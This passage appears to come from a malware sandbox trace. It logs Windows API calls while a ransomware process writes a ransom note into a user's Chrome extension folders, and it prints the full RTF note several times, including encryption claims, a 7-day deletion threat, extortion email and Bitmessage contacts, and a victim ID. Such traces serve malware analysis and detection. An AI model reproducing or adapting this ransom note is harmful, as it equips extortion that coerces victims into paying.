br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.172] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.173] CloseHandle (hObject=0x2e8) returned 1 [0292.173] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\#readme_eman#.rtf")) returned 0xffffffff [0292.173] GetLastError () returned 0x2 [0292.173] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.174] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.174] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.174] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 